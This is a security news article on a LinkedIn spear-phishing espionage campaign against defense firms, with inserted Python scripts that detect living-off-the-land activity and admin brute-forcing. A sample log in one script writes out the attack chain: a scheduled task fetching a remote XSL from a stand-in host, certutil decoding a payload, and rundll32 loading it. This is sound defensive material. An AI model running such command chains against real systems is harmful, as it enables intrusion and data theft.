Attackers are impersonating human resource employees from Collins Aerospace and General Dynamics in a spear-phishing campaign leveraging LinkedIn’s messaging service. Targets are sent phony job offers that include malicious documents designed to fetch data-exfiltrating malware.
The spear-phishing messages were part of a widespread campaign, dubbed “Operation In(ter)ception,” which targeted victims at European and Middle East aerospace and military companies. Researchers believe the primary goal of the attacks, which occurred from September to December 2019, was espionage. However, in one case, attackers also tried to utilize a compromised victim’s email account in a business email compromise (BEC) attack, showing that they may also have financial motives.
The cyberattacks “were highly targeted and relied on social engineering over LinkedIn and custom, multistage malware,” said researchers with ESET in a Wednesday analysis, shared at ESET Virtual World 2020. “To operate under the radar, the attackers frequently recompiled their malware, abused native Windows utilities and impersonated legitimate software and companies. To our knowledge, the custom malware used in Operation In(ter)ception hasn’t been previously documented.”
Victims were first sent a job offer in a LinkedIn message from a “well-known company in a relevant sector.” These included Collins Aerospace (formerly Rockwell Collins), a major U.S. supplier of aerospace and defense products, and General Dynamics, another large U.S.-based corporation.
The “job offer” file was a password-protected RAR archive containing a LNK file. Once opened, it displayed a seemingly innocuous PDF document showing salary information related to the fake job.
However, the PDF was a decoy: Behind the scenes, the Command Prompt (the command-line interface used to execute commands in Windows) was invoked to create a scheduled task. Here, attackers are making use of a Windows component called Task Scheduler, which provides the ability to launch programs at pre-defined times. The scheduled task was set to execute a remote XSL script. XSL (Extensible Stylesheet Language) files are commonly used for processing data within XML files.
The XSL script downloaded base64-encoded payloads, which were then decoded by a legitimate Windows utility called certutil. Certutil is a command-line program used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates. Another Windows command-line utility, rundll32 (used for loading DLLs), was then used to download and run a PowerShell DLL.
The abuse of these two legitimate, preinstalled Windows utilities by attackers is a common method called “living off the land,” used to carry out malicious activity covertly under the guise of normal system activity.
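The chain described above (a scheduled task pointing at a remote XSL file, certutil decoding a payload, rundll32 loading a DLL from a user-writable folder) is exactly the kind of sequence a defender can correlate in process-creation telemetry. The following is an added example, not code from the ESET report or from Threatpost: it parses a constructed, simplified process-creation log (the field layout and all sample lines are made up for this example, and `[utility]` and `placeholder.example` stand in for the real component and server, which the article does not name), flags each of the three living-off-the-land indicators, and raises a per-host alert when two or more of them appear together.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records (not from the ESET report).
# The layout imitates what a Sysmon or 4688-style source provides: host,
# parent image, image, and the full command line as the final field.
# ws01 is ordinary admin activity; ws02 resembles the chain in the article.
SAMPLE_LOG = r"""
host=ws01 parent=explorer.exe image=cmd.exe cmdline=cmd.exe /c dir C:\Users
host=ws01 parent=cmd.exe image=certutil.exe cmdline=certutil.exe -dump
host=ws01 parent=services.exe image=rundll32.exe cmdline=rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL
host=ws02 parent=cmd.exe image=schtasks.exe cmdline=schtasks /create /tn Updater /tr "[utility] http://placeholder.example/job.xsl" /sc minute
host=ws02 parent=[utility] image=certutil.exe cmdline=certutil.exe -decode C:\Users\Public\payload.txt C:\Users\Public\payload.dll
host=ws02 parent=[utility] image=rundll32.exe cmdline=rundll32.exe C:\Users\Public\payload.dll,Run
"""

# A remote (http/https) URL ending in .xsl inside a command line.
REMOTE_XSL = re.compile(r"(?i)https?://\S+\.xsl")
# Directories a normal user can write to; legitimate rundll32 targets
# almost always live under C:\Windows instead.
USER_WRITABLE = re.compile(r"(?i)(C:\\Users\\|\\AppData\\|\\Temp\\|C:\\ProgramData\\)")


def parse_line(line):
    """Split one record into a dict; everything after 'cmdline=' is the command line."""
    head, _, cmdline = line.partition(" cmdline=")
    fields = dict(tok.split("=", 1) for tok in head.split())
    fields["cmdline"] = cmdline
    return fields


def indicators(ev):
    """Return the names of the living-off-the-land indicators matched by one event."""
    image = ev["image"].lower()
    cmd = ev["cmdline"]
    found = []
    if image == "schtasks.exe" and "/create" in cmd.lower() and REMOTE_XSL.search(cmd):
        found.append("schtasks_remote_xsl")
    if image == "certutil.exe" and re.search(r"(?i)-decode(hex)?\b", cmd):
        found.append("certutil_decode")
    if image == "rundll32.exe" and USER_WRITABLE.search(cmd):
        found.append("rundll32_user_writable_dll")
    return found


def analyse(log_text, min_indicators=2):
    """Collect indicators per host and list hosts where several appear together."""
    per_host = defaultdict(set)
    for line in log_text.strip().splitlines():
        ev = parse_line(line)
        for name in indicators(ev):
            per_host[ev["host"]].add(name)
    findings = {h: sorted(s) for h, s in per_host.items()}
    chain_hosts = sorted(h for h, s in per_host.items() if len(s) >= min_indicators)
    return findings, chain_hosts


if __name__ == "__main__":
    findings, hosts = analyse(SAMPLE_LOG)
    for host, names in findings.items():
        print(host, names)
    print("hosts with chained indicators:", hosts)
```

Each single indicator is noisy on its own (certutil and rundll32 have plenty of legitimate uses), which is why the alert fires on the combination per host rather than on any one event; the thresholds and path list are assumptions to tune against your own baseline.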
Since the logging of executed PowerShell commands is disabled by default, researchers couldn’t retrieve the commands used by the malware. However, they found that the attackers queried the AD (Active Directory) server to obtain a list of employees, including administrator accounts, and subsequently performed password brute-force attacks on the administrator accounts.
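The post-compromise step in that paragraph, brute-forcing the administrator accounts pulled from Active Directory, leaves a trail that does not depend on PowerShell logging: repeated failed logons against privileged accounts from a single source. The following is an added example, not code from the report, that runs two checks over a constructed set of failed-logon records (timestamps, source hosts and account names are all made up; the record format is a simplification of what a 4625-style "failed logon" event carries, and the `ADMIN_ACCOUNTS` set stands in for real AD group membership): many failures against one admin account, and one source touching several admin accounts within a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon records (not from the ESET report): one source,
# ws02, hammering an admin account and then moving across other admin
# accounts; ws05 is a user mistyping their own password twice.
SAMPLE_FAILURES = """\
2019-10-03T02:11:05 src=ws02 user=admin.backup
2019-10-03T02:11:09 src=ws02 user=admin.backup
2019-10-03T02:11:14 src=ws02 user=admin.backup
2019-10-03T02:11:20 src=ws02 user=admin.backup
2019-10-03T02:11:27 src=ws02 user=admin.backup
2019-10-03T02:11:33 src=ws02 user=admin.backup
2019-10-03T02:12:01 src=ws02 user=da.ops
2019-10-03T02:12:05 src=ws02 user=da.ops
2019-10-03T02:12:40 src=ws02 user=svc.sql
2019-10-03T09:15:00 src=ws05 user=jsmith
2019-10-03T09:15:30 src=ws05 user=jsmith
"""

# Assumed privileged accounts; in practice this list comes from AD group
# membership (Domain Admins, Administrators and the like).
ADMIN_ACCOUNTS = {"admin.backup", "da.ops", "svc.sql"}


def parse_failures(text):
    """Return (timestamp, source host, account) tuples from the constructed format."""
    records = []
    for line in text.strip().splitlines():
        ts, src, user = line.split()
        records.append((datetime.fromisoformat(ts), src.split("=", 1)[1], user.split("=", 1)[1]))
    return records


def max_in_window(times, window):
    """Largest number of events that fall inside any sliding window of length `window`."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_admin_bruteforce(records, admins, threshold=5, window=timedelta(minutes=10)):
    """(source, account) pairs with at least `threshold` failures against one admin account."""
    by_target = defaultdict(list)
    for t, src, user in records:
        if user in admins:
            by_target[(src, user)].append(t)
    return sorted(k for k, times in by_target.items() if max_in_window(times, window) >= threshold)


def detect_admin_spray(records, admins, min_accounts=3, window=timedelta(minutes=10)):
    """Sources that fail against at least `min_accounts` distinct admin accounts within `window`."""
    by_src = defaultdict(list)
    for t, src, user in records:
        if user in admins:
            by_src[src].append((t, user))
    hits = []
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            distinct = {u for t, u in events[i:] if t - t0 <= window}
            if len(distinct) >= min_accounts:
                hits.append(src)
                break
    return sorted(hits)


if __name__ == "__main__":
    recs = parse_failures(SAMPLE_FAILURES)
    print("brute force:", detect_admin_bruteforce(recs, ADMIN_ACCOUNTS))
    print("spray:", detect_admin_spray(recs, ADMIN_ACCOUNTS))
```

Both checks assume that logon auditing is enabled on the domain controllers so that failed logons are recorded at all; the thresholds and window are starting points to adjust against normal lockout and helpdesk activity in your environment.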
Researchers also noted that attackers archived the collected data into a RAR file and used a custom build of dbxcli, a legitimate open-source command-line client for Dropbox users and admins.
“Based on the job titles of the employees initially targeted via LinkedIn, it appears that Operation In(ter)ception targeted technical and business-related information,” said researchers. However, “Neither the malware analysis nor the investigation allowed us to gain insight into what exact file types the attackers were aiming for.”
In one situation, attackers found communication (in the victim’s emails) between the victim and a customer regarding an unresolved invoice. The attackers followed up in the conversation, purporting to be the victim, and urged the customer to pay the invoice to a bad actor controlled bank account.
“Fortunately, the victim company’s customer became suspicious and reached out to the victim for assistance, thwarting the attackers’ attempt to conduct a so-called business email compromise attack,” said researchers.
Paul Rockwell, head of trust and safety with LinkedIn, said that the creation of a fake account or fraudulent activity with an intent to mislead or lie to LinkedIn members “is a violation of our terms of service.” He said that, at this time, the attacker-owned accounts in question have been permanently restricted.
“We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members,” he said in a statement to Threatpost. “We don’t wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies. Our teams utilize a variety of automated technologies, combined with a trained team of reviewers and member reporting, to keep our members safe from all types of bad actors.”
ESET researchers said that, while they did not find strong evidence connecting the attacks to a known threat actor, they did discover several hints suggesting a “possible link” to the Lazarus group, including similarities in targeting, development environment, and anti-analysis techniques used.
Researchers warn users to keep an eye out for the staples of spear-phishing emails, such as suspicious attachments and spelling errors, which can also appear on LinkedIn.
“Our research into Operation In(ter)ception shows again how effective spearphishing can be for compromising a target of interest,” they said. “In the investigated cases, the adversaries used LinkedIn to select employees of the targeted military and defense companies and subsequently approached them with fake job offers. Unafraid of direct contact, the attackers chatted with the victims to convince them to open malicious files.”